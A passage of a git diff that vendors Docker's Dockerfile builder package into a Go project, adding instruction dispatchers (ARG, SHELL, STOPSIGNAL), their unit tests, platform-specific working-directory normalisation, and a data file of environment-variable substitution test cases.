b.runConfig.Volumes[v] = struct{}{} + } + if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("VOLUME %v", args)); err != nil { + return err + } + return nil +} + +// STOPSIGNAL signal +// +// Set the signal that will be used to kill the container. 
+func stopSignal(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("STOPSIGNAL") + } + + sig := args[0] + _, err := signal.ParseSignal(sig) + if err != nil { + return err + } + + b.runConfig.StopSignal = sig + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("STOPSIGNAL %v", args)) +} + +// ARG name[=value] +// +// Adds the variable foo to the trusted list of variables that can be passed +// to builder using the --build-arg flag for expansion/subsitution or passing to 'run'. +// Dockerfile author may optionally set a default value of this variable. +func arg(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("ARG") + } + + var ( + name string + newValue string + hasDefault bool + ) + + arg := args[0] + // 'arg' can just be a name or name-value pair. Note that this is different + // from 'env' that handles the split of name and value at the parser level. + // The reason for doing it differently for 'arg' is that we support just + // defining an arg and not assign it a value (while 'env' always expects a + // name-value pair). If possible, it will be good to harmonize the two. + if strings.Contains(arg, "=") { + parts := strings.SplitN(arg, "=", 2) + if len(parts[0]) == 0 { + return errBlankCommandNames("ARG") + } + + name = parts[0] + newValue = parts[1] + hasDefault = true + } else { + name = arg + hasDefault = false + } + // add the arg to allowed list of build-time args from this step on. + b.allowedBuildArgs[name] = true + + // If there is a default value associated with this arg then add it to the + // b.buildArgs if one is not already passed to the builder. The args passed + // to builder override the default value of 'arg'. 
Note that a 'nil' for + // a value means that the user specified "--build-arg FOO" and "FOO" wasn't + // defined as an env var - and in that case we DO want to use the default + // value specified in the ARG cmd. + if baValue, ok := b.options.BuildArgs[name]; (!ok || baValue == nil) && hasDefault { + b.options.BuildArgs[name] = &newValue + } + + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ARG %s", arg)) +} + +// SHELL powershell -command +// +// Set the non-default shell to use. +func shell(b *Builder, args []string, attributes map[string]bool, original string) error { + if err := b.flags.Parse(); err != nil { + return err + } + shellSlice := handleJSONArgs(args, attributes) + switch { + case len(shellSlice) == 0: + // SHELL [] + return errAtLeastOneArgument("SHELL") + case attributes["json"]: + // SHELL ["powershell", "-command"] + b.runConfig.Shell = strslice.StrSlice(shellSlice) + default: + // SHELL powershell -command - not JSON + return errNotJSON("SHELL", original) + } + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("SHELL %v", shellSlice)) +} + +func errAtLeastOneArgument(command string) error { + return fmt.Errorf("%s requires at least one argument", command) +} + +func errExactlyOneArgument(command string) error { + return fmt.Errorf("%s requires exactly one argument", command) +} + +func errAtLeastTwoArguments(command string) error { + return fmt.Errorf("%s requires at least two arguments", command) +} + +func errBlankCommandNames(command string) error { + return fmt.Errorf("%s names can not be blank", command) +} + +func errTooManyArguments(command string) error { + return fmt.Errorf("Bad input to %s, too many arguments", command) +} + +// getShell is a helper function which gets the right shell for prefixing the +// shell-form of RUN, ENTRYPOINT and CMD instructions +func getShell(c *container.Config) []string { + if 0 == len(c.Shell) { + return defaultShell[:] + } + return c.Shell[:] +} diff --git 
a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go new file mode 100644 index 0000000000..f7c57f7e3b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go @@ -0,0 +1,517 @@ +package dockerfile + +import ( + "fmt" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +type commandWithFunction struct { + name string + function func(args []string) error +} + +func TestCommandsExactlyOneArgument(t *testing.T) { + commands := []commandWithFunction{ + {"MAINTAINER", func(args []string) error { return maintainer(nil, args, nil, "") }}, + {"FROM", func(args []string) error { return from(nil, args, nil, "") }}, + {"WORKDIR", func(args []string) error { return workdir(nil, args, nil, "") }}, + {"USER", func(args []string) error { return user(nil, args, nil, "") }}, + {"STOPSIGNAL", func(args []string) error { return stopSignal(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errExactlyOneArgument(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. 
Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandsAtLeastOneArgument(t *testing.T) { + commands := []commandWithFunction{ + {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, + {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}, + {"ONBUILD", func(args []string) error { return onbuild(nil, args, nil, "") }}, + {"HEALTHCHECK", func(args []string) error { return healthcheck(nil, args, nil, "") }}, + {"EXPOSE", func(args []string) error { return expose(nil, args, nil, "") }}, + {"VOLUME", func(args []string) error { return volume(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errAtLeastOneArgument(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandsAtLeastTwoArguments(t *testing.T) { + commands := []commandWithFunction{ + {"ADD", func(args []string) error { return add(nil, args, nil, "") }}, + {"COPY", func(args []string) error { return dispatchCopy(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{"arg1"}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errAtLeastTwoArguments(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. 
Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandsTooManyArguments(t *testing.T) { + commands := []commandWithFunction{ + {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, + {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}} + + for _, command := range commands { + err := command.function([]string{"arg1", "arg2", "arg3"}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errTooManyArguments(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestCommandseBlankNames(t *testing.T) { + bflags := &BFlags{} + config := &container.Config{} + + b := &Builder{flags: bflags, runConfig: config, disableCommit: true} + + commands := []commandWithFunction{ + {"ENV", func(args []string) error { return env(b, args, nil, "") }}, + {"LABEL", func(args []string) error { return label(b, args, nil, "") }}, + } + + for _, command := range commands { + err := command.function([]string{"", ""}) + + if err == nil { + t.Fatalf("Error should be present for %s command", command.name) + } + + expectedError := errBlankCommandNames(command.name) + + if err.Error() != expectedError.Error() { + t.Fatalf("Wrong error message for %s. Got: %s. 
Should be: %s", command.name, err.Error(), expectedError) + } + } +} + +func TestEnv2Variables(t *testing.T) { + variables := []string{"var1", "val1", "var2", "val2"} + + bflags := &BFlags{} + config := &container.Config{} + + b := &Builder{flags: bflags, runConfig: config, disableCommit: true} + + if err := env(b, variables, nil, ""); err != nil { + t.Fatalf("Error when executing env: %s", err.Error()) + } + + expectedVar1 := fmt.Sprintf("%s=%s", variables[0], variables[1]) + expectedVar2 := fmt.Sprintf("%s=%s", variables[2], variables[3]) + + if b.runConfig.Env[0] != expectedVar1 { + t.Fatalf("Wrong env output for first variable. Got: %s. Should be: %s", b.runConfig.Env[0], expectedVar1) + } + + if b.runConfig.Env[1] != expectedVar2 { + t.Fatalf("Wrong env output for second variable. Got: %s, Should be: %s", b.runConfig.Env[1], expectedVar2) + } +} + +func TestMaintainer(t *testing.T) { + maintainerEntry := "Some Maintainer " + + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + if err := maintainer(b, []string{maintainerEntry}, nil, ""); err != nil { + t.Fatalf("Error when executing maintainer: %s", err.Error()) + } + + if b.maintainer != maintainerEntry { + t.Fatalf("Maintainer in builder should be set to %s. 
Got: %s", maintainerEntry, b.maintainer) + } +} + +func TestLabel(t *testing.T) { + labelName := "label" + labelValue := "value" + + labelEntry := []string{labelName, labelValue} + + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + if err := label(b, labelEntry, nil, ""); err != nil { + t.Fatalf("Error when executing label: %s", err.Error()) + } + + if val, ok := b.runConfig.Labels[labelName]; ok { + if val != labelValue { + t.Fatalf("Label %s should have value %s, had %s instead", labelName, labelValue, val) + } + } else { + t.Fatalf("Label %s should be present but it is not", labelName) + } +} + +func TestFrom(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + err := from(b, []string{"scratch"}, nil, "") + + if runtime.GOOS == "windows" { + if err == nil { + t.Fatalf("Error not set on Windows") + } + + expectedError := "Windows does not support FROM scratch" + + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("Error message not correct on Windows. 
Should be: %s, got: %s", expectedError, err.Error()) + } + } else { + if err != nil { + t.Fatalf("Error when executing from: %s", err.Error()) + } + + if b.image != "" { + t.Fatalf("Image shoule be empty, got: %s", b.image) + } + + if b.noBaseImage != true { + t.Fatalf("Image should not have any base image, got: %v", b.noBaseImage) + } + } +} + +func TestOnbuildIllegalTriggers(t *testing.T) { + triggers := []struct{ command, expectedError string }{ + {"ONBUILD", "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed"}, + {"MAINTAINER", "MAINTAINER isn't allowed as an ONBUILD trigger"}, + {"FROM", "FROM isn't allowed as an ONBUILD trigger"}} + + for _, trigger := range triggers { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + err := onbuild(b, []string{trigger.command}, nil, "") + + if err == nil { + t.Fatalf("Error should not be nil") + } + + if !strings.Contains(err.Error(), trigger.expectedError) { + t.Fatalf("Error message not correct. Should be: %s, got: %s", trigger.expectedError, err.Error()) + } + } +} + +func TestOnbuild(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + err := onbuild(b, []string{"ADD", ".", "/app/src"}, nil, "ONBUILD ADD . /app/src") + + if err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + expectedOnbuild := "ADD . /app/src" + + if b.runConfig.OnBuild[0] != expectedOnbuild { + t.Fatalf("Wrong ONBUILD command. 
Expected: %s, got: %s", expectedOnbuild, b.runConfig.OnBuild[0]) + } +} + +func TestWorkdir(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + workingDir := "/app" + + if runtime.GOOS == "windows" { + workingDir = "C:\app" + } + + err := workdir(b, []string{workingDir}, nil, "") + + if err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.WorkingDir != workingDir { + t.Fatalf("WorkingDir should be set to %s, got %s", workingDir, b.runConfig.WorkingDir) + } + +} + +func TestCmd(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + command := "./executable" + + err := cmd(b, []string{command}, nil, "") + + if err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + var expectedCommand strslice.StrSlice + + if runtime.GOOS == "windows" { + expectedCommand = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", command)) + } else { + expectedCommand = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", command)) + } + + if !compareStrSlice(b.runConfig.Cmd, expectedCommand) { + t.Fatalf("Command should be set to %s, got %s", command, b.runConfig.Cmd) + } + + if !b.cmdSet { + t.Fatalf("Command should be marked as set") + } +} + +func compareStrSlice(slice1, slice2 strslice.StrSlice) bool { + if len(slice1) != len(slice2) { + return false + } + + for i := range slice1 { + if slice1[i] != slice2[i] { + return false + } + } + + return true +} + +func TestHealthcheckNone(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + if err := healthcheck(b, []string{"NONE"}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Healthcheck == nil { + t.Fatal("Healthcheck should be set, got nil") + } + + expectedTest := strslice.StrSlice(append([]string{"NONE"})) + + if !compareStrSlice(expectedTest, 
b.runConfig.Healthcheck.Test) { + t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) + } +} + +func TestHealthcheckCmd(t *testing.T) { + b := &Builder{flags: &BFlags{flags: make(map[string]*Flag)}, runConfig: &container.Config{}, disableCommit: true} + + if err := healthcheck(b, []string{"CMD", "curl", "-f", "http://localhost/", "||", "exit", "1"}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Healthcheck == nil { + t.Fatal("Healthcheck should be set, got nil") + } + + expectedTest := strslice.StrSlice(append([]string{"CMD-SHELL"}, "curl -f http://localhost/ || exit 1")) + + if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) { + t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test) + } +} + +func TestEntrypoint(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + entrypointCmd := "/usr/sbin/nginx" + + if err := entrypoint(b, []string{entrypointCmd}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Entrypoint == nil { + t.Fatalf("Entrypoint should be set") + } + + var expectedEntrypoint strslice.StrSlice + + if runtime.GOOS == "windows" { + expectedEntrypoint = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", entrypointCmd)) + } else { + expectedEntrypoint = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", entrypointCmd)) + } + + if !compareStrSlice(expectedEntrypoint, b.runConfig.Entrypoint) { + t.Fatalf("Entrypoint command should be set to %s, got %s", expectedEntrypoint, b.runConfig.Entrypoint) + } +} + +func TestExpose(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + exposedPort := "80" + + if err := expose(b, []string{exposedPort}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if 
b.runConfig.ExposedPorts == nil { + t.Fatalf("ExposedPorts should be set") + } + + if len(b.runConfig.ExposedPorts) != 1 { + t.Fatalf("ExposedPorts should contain only 1 element. Got %s", b.runConfig.ExposedPorts) + } + + portsMapping, err := nat.ParsePortSpec(exposedPort) + + if err != nil { + t.Fatalf("Error when parsing port spec: %s", err.Error()) + } + + if _, ok := b.runConfig.ExposedPorts[portsMapping[0].Port]; !ok { + t.Fatalf("Port %s should be present. Got %s", exposedPort, b.runConfig.ExposedPorts) + } +} + +func TestUser(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + userCommand := "foo" + + if err := user(b, []string{userCommand}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.User != userCommand { + t.Fatalf("User should be set to %s, got %s", userCommand, b.runConfig.User) + } +} + +func TestVolume(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + exposedVolume := "/foo" + + if err := volume(b, []string{exposedVolume}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Volumes == nil { + t.Fatalf("Volumes should be set") + } + + if len(b.runConfig.Volumes) != 1 { + t.Fatalf("Volumes should contain only 1 element. Got %s", b.runConfig.Volumes) + } + + if _, ok := b.runConfig.Volumes[exposedVolume]; !ok { + t.Fatalf("Volume %s should be present. 
Got %s", exposedVolume, b.runConfig.Volumes) + } +} + +func TestStopSignal(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + signal := "SIGKILL" + + if err := stopSignal(b, []string{signal}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.StopSignal != signal { + t.Fatalf("StopSignal should be set to %s, got %s", signal, b.runConfig.StopSignal) + } +} + +func TestArg(t *testing.T) { + buildOptions := &types.ImageBuildOptions{BuildArgs: make(map[string]*string)} + + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true, allowedBuildArgs: make(map[string]bool), options: buildOptions} + + argName := "foo" + argVal := "bar" + argDef := fmt.Sprintf("%s=%s", argName, argVal) + + if err := arg(b, []string{argDef}, nil, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + allowed, ok := b.allowedBuildArgs[argName] + + if !ok { + t.Fatalf("%s argument should be allowed as a build arg", argName) + } + + if !allowed { + t.Fatalf("%s argument was present in map but disallowed as a build arg", argName) + } + + val, ok := b.options.BuildArgs[argName] + + if !ok { + t.Fatalf("%s argument should be a build arg", argName) + } + + if *val != "bar" { + t.Fatalf("%s argument should have default value 'bar', got %s", argName, val) + } +} + +func TestShell(t *testing.T) { + b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + + shellCmd := "powershell" + + attrs := make(map[string]bool) + attrs["json"] = true + + if err := shell(b, []string{shellCmd}, attrs, ""); err != nil { + t.Fatalf("Error should be empty, got: %s", err.Error()) + } + + if b.runConfig.Shell == nil { + t.Fatalf("Shell should be set") + } + + expectedShell := strslice.StrSlice([]string{shellCmd}) + + if !compareStrSlice(expectedShell, b.runConfig.Shell) { + t.Fatalf("Shell should be set to %s, got %s", 
expectedShell, b.runConfig.Shell) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go new file mode 100644 index 0000000000..8b0dfc3911 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go @@ -0,0 +1,27 @@ +// +build !windows + +package dockerfile + +import ( + "fmt" + "os" + "path/filepath" +) + +// normaliseWorkdir normalises a user requested working directory in a +// platform semantically consistent way. +func normaliseWorkdir(current string, requested string) (string, error) { + if requested == "" { + return "", fmt.Errorf("cannot normalise nothing") + } + current = filepath.FromSlash(current) + requested = filepath.FromSlash(requested) + if !filepath.IsAbs(requested) { + return filepath.Join(string(os.PathSeparator), current, requested), nil + } + return requested, nil +} + +func errNotJSON(command, _ string) error { + return fmt.Errorf("%s requires the arguments to be in JSON form", command) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go new file mode 100644 index 0000000000..4aae6b460e --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go @@ -0,0 +1,33 @@ +// +build !windows + +package dockerfile + +import ( + "testing" +) + +func TestNormaliseWorkdir(t *testing.T) { + testCases := []struct{ current, requested, expected, expectedError string }{ + {``, ``, ``, `cannot normalise nothing`}, + {``, `foo`, `/foo`, ``}, + {``, `/foo`, `/foo`, ``}, + {`/foo`, `bar`, `/foo/bar`, ``}, + {`/foo`, `/bar`, `/bar`, ``}, + } + + for _, test := range testCases { + normalised, err := normaliseWorkdir(test.current, test.requested) + + if test.expectedError != "" && err == nil { + t.Fatalf("NormaliseWorkdir should return an error %s, got nil", test.expectedError) + } 
+ + if test.expectedError != "" && err.Error() != test.expectedError { + t.Fatalf("NormaliseWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error()) + } + + if normalised != test.expected { + t.Fatalf("NormaliseWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalised) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go new file mode 100644 index 0000000000..e890c3ae18 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go @@ -0,0 +1,86 @@ +package dockerfile + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + "github.com/docker/docker/pkg/system" +) + +var pattern = regexp.MustCompile(`^[a-zA-Z]:\.$`) + +// normaliseWorkdir normalises a user requested working directory in a +// platform semantically consistent way. +func normaliseWorkdir(current string, requested string) (string, error) { + if requested == "" { + return "", fmt.Errorf("cannot normalise nothing") + } + + // `filepath.Clean` will replace "" with "." so skip in that case + if current != "" { + current = filepath.Clean(current) + } + if requested != "" { + requested = filepath.Clean(requested) + } + + // If either current or requested in Windows is: + // C: + // C:. + // then an error will be thrown as the definition for the above + // refers to `current directory on drive C:` + // Since filepath.Clean() will automatically normalize the above + // to `C:.`, we only need to check the last format + if pattern.MatchString(current) { + return "", fmt.Errorf("%s is not a directory. If you are specifying a drive letter, please add a trailing '\\'", current) + } + if pattern.MatchString(requested) { + return "", fmt.Errorf("%s is not a directory. 
If you are specifying a drive letter, please add a trailing '\\'", requested) + } + + // Target semantics is C:\somefolder, specifically in the format: + // UPPERCASEDriveLetter-Colon-Backslash-FolderName. We are already + // guaranteed that `current`, if set, is consistent. This allows us to + // cope correctly with any of the following in a Dockerfile: + // WORKDIR a --> C:\a + // WORKDIR c:\\foo --> C:\foo + // WORKDIR \\foo --> C:\foo + // WORKDIR /foo --> C:\foo + // WORKDIR c:\\foo \ WORKDIR bar --> C:\foo --> C:\foo\bar + // WORKDIR C:/foo \ WORKDIR bar --> C:\foo --> C:\foo\bar + // WORKDIR C:/foo \ WORKDIR \\bar --> C:\foo --> C:\bar + // WORKDIR /foo \ WORKDIR c:/bar --> C:\foo --> C:\bar + if len(current) == 0 || system.IsAbs(requested) { + if (requested[0] == os.PathSeparator) || + (len(requested) > 1 && string(requested[1]) != ":") || + (len(requested) == 1) { + requested = filepath.Join(`C:\`, requested) + } + } else { + requested = filepath.Join(current, requested) + } + // Upper-case drive letter + return (strings.ToUpper(string(requested[0])) + requested[1:]), nil +} + +func errNotJSON(command, original string) error { + // For Windows users, give a hint if it looks like it might contain + // a path which hasn't been escaped such as ["c:\windows\system32\prog.exe", "-param"], + // as JSON must be escaped. Unfortunate... + // + // Specifically looking for quote-driveletter-colon-backslash, there's no + // double backslash and a [] pair. No, this is not perfect, but it doesn't + // have to be. It's simply a hint to make life a little easier. + extra := "" + original = filepath.FromSlash(strings.ToLower(strings.Replace(strings.ToLower(original), strings.ToLower(command)+" ", "", -1))) + if len(regexp.MustCompile(`"[a-z]:\\.*`).FindStringSubmatch(original)) > 0 && + !strings.Contains(original, `\\`) && + strings.Contains(original, "[") && + strings.Contains(original, "]") { + extra = fmt.Sprintf(`. 
It looks like '%s' includes a file path without an escaped back-slash. JSON requires back-slashes to be escaped such as ["c:\\path\\to\\file.exe", "/parameter"]`, original) + } + return fmt.Errorf("%s requires the arguments to be in JSON form%s", command, extra) +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go new file mode 100644 index 0000000000..3319c06582 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go @@ -0,0 +1,40 @@ +// +build windows + +package dockerfile + +import "testing" + +func TestNormaliseWorkdir(t *testing.T) { + tests := []struct{ current, requested, expected, etext string }{ + {``, ``, ``, `cannot normalise nothing`}, + {``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {`c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {`c:.`, `\a`, ``, `c:. is not a directory. 
If you are specifying a drive letter, please add a trailing '\'`}, + {``, `a`, `C:\a`, ``}, + {``, `c:\foo`, `C:\foo`, ``}, + {``, `c:\\foo`, `C:\foo`, ``}, + {``, `\foo`, `C:\foo`, ``}, + {``, `\\foo`, `C:\foo`, ``}, + {``, `/foo`, `C:\foo`, ``}, + {``, `C:/foo`, `C:\foo`, ``}, + {`C:\foo`, `bar`, `C:\foo\bar`, ``}, + {`C:\foo`, `/bar`, `C:\bar`, ``}, + {`C:\foo`, `\bar`, `C:\bar`, ``}, + } + for _, i := range tests { + r, e := normaliseWorkdir(i.current, i.requested) + + if i.etext != "" && e == nil { + t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested) + } + + if i.etext != "" && e.Error() != i.etext { + t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error()) + } + + if r != i.expected { + t.Fatalf("TestNormaliseWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest new file mode 100644 index 0000000000..067dca9a54 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest @@ -0,0 +1,116 @@ +A|hello | hello +A|he'll'o | hello +A|he'llo | hello +A|he\'llo | he'llo +A|he\\'llo | he\llo +A|abc\tdef | abctdef +A|"abc\tdef" | abc\tdef +A|'abc\tdef' | abc\tdef +A|hello\ | hello +A|hello\\ | hello\ +A|"hello | hello +A|"hello\" | hello" +A|"hel'lo" | hel'lo +A|'hello | hello +A|'hello\' | hello\ +A|"''" | '' +A|$. | $. +A|$1 | +A|he$1x | hex +A|he$.x | he$.x +# Next one is different on Windows as $pwd==$PWD +U|he$pwd. | he. +W|he$pwd. | he/home. 
+A|he$PWD | he/home +A|he\$PWD | he$PWD +A|he\\$PWD | he\/home +A|he\${} | he${} +A|he\${}xx | he${}xx +A|he${} | he +A|he${}xx | hexx +A|he${hi} | he +A|he${hi}xx | hexx +A|he${PWD} | he/home +A|he${.} | error +A|he${XXX:-000}xx | he000xx +A|he${PWD:-000}xx | he/homexx +A|he${XXX:-$PWD}xx | he/homexx +A|he${XXX:-${PWD:-yyy}}xx | he/homexx +A|he${XXX:-${YYY:-yyy}}xx | heyyyxx +A|he${XXX:YYY} | error +A|he${XXX:+${PWD}}xx | hexx +A|he${PWD:+${XXX}}xx | hexx +A|he${PWD:+${SHELL}}xx | hebashxx +A|he${XXX:+000}xx | hexx +A|he${PWD:+000}xx | he000xx +A|'he${XX}' | he${XX} +A|"he${PWD}" | he/home +A|"he'$PWD'" | he'/home' +A|"$PWD" | /home +A|'$PWD' | $PWD +A|'\$PWD' | \$PWD +A|'"hello"' | "hello" +A|he\$PWD | he$PWD +A|"he\$PWD" | he$PWD +A|'he\$PWD' | he\$PWD +A|he${PWD | error +A|he${PWD:=000}xx | error +A|he${PWD:+${PWD}:}xx | he/home:xx +A|he${XXX:-\$PWD:}xx | he$PWD:xx +A|he${XXX:-\${PWD}z}xx | he${PWDz}xx +A|안녕하세요 | 안녕하세요 +A|안'녕'하세요 | 안녕하세요 +A|안'녕하세요 | 안녕하세요 +A|안녕\'하세요 | 안녕'하세요 +A|안\\'녕하세요 | 안\녕하세요 +A|안녕\t하세요 | 안녕t하세요 +A|"안녕\t하세요" | 안녕\t하세요 +A|'안녕\t하세요 | 안녕\t하세요 +A|안녕하세요\ | 안녕하세요 +A|안녕하세요\\ | 안녕하세요\ +A|"안녕하세요 | 안녕하세요 +A|"안녕하세요\" | 안녕하세요" +A|"안녕'하세요" | 안녕'하세요 +A|'안녕하세요 | 안녕하세요 +A|'안녕하세요\' | 안녕하세요\ +A|안녕$1x | 안녕x +A|안녕$.x | 안녕$.x +# Next one is different on Windows as $pwd==$PWD +U|안녕$pwd. | 안녕. +W|안녕$pwd. | 안녕/home. 
+A|안녕$PWD | 안녕/home +A|안녕\$PWD | 안녕$PWD +A|안녕\\$PWD | 안녕\/home +A|안녕\${} | 안녕${} +A|안녕\${}xx | 안녕${}xx +A|안녕${} | 안녕 +A|안녕${}xx | 안녕xx +A|안녕${hi} | 안녕 +A|안녕${hi}xx | 안녕xx +A|안녕${PWD} | 안녕/home +A|안녕${.} | error +A|안녕${XXX:-000}xx | 안녕000xx +A|안녕${PWD:-000}xx | 안녕/homexx +A|안녕${XXX:-$PWD}xx | 안녕/homexx +A|안녕${XXX:-${PWD:-yyy}}xx | 안녕/homexx +A|안녕${XXX:-${YYY:-yyy}}xx | 안녕yyyxx +A|안녕${XXX:YYY} | error +A|안녕${XXX:+${PWD}}xx | 안녕xx +A|안녕${PWD:+${XXX}}xx | 안녕xx +A|안녕${PWD:+${SHELL}}xx | 안녕bashxx +A|안녕${XXX:+000}xx | 안녕xx +A|안녕${PWD:+000}xx | 안녕000xx +A|'안녕${XX}' | 안녕${XX} +A|"안녕${PWD}" | 안녕/home +A|"안녕'$PWD'" | 안녕'/home' +A|'"안녕"' | "안녕" +A|안녕\$PWD | 안녕$PWD +A|"안녕\$PWD" | 안녕$PWD +A|'안녕\$PWD' | 안녕\$PWD +A|안녕${PWD | error +A|안녕${PWD:=000}xx | error +A|안녕${PWD:+${PWD}:}xx | 안녕/home:xx +A|안녕${XXX:-\$PWD:}xx | 안녕$PWD:xx +A|안녕${XXX:-\${PWD}z}xx | 안녕${PWDz}xx +A|$KOREAN | 한국어 +A|안녕$KOREAN | 안녕한국어 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go new file mode 100644 index 0000000000..f5997c91a6 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go @@ -0,0 +1,244 @@ +// Package dockerfile is the evaluation step in the Dockerfile parse/evaluate pipeline. +// +// It incorporates a dispatch table based on the parser.Node values (see the +// parser package for more information) that are yielded from the parser itself. +// Calling NewBuilder with the BuildOpts struct can be used to customize the +// experience for execution purposes only. Parsing is controlled in the parser +// package, and this division of responsibility 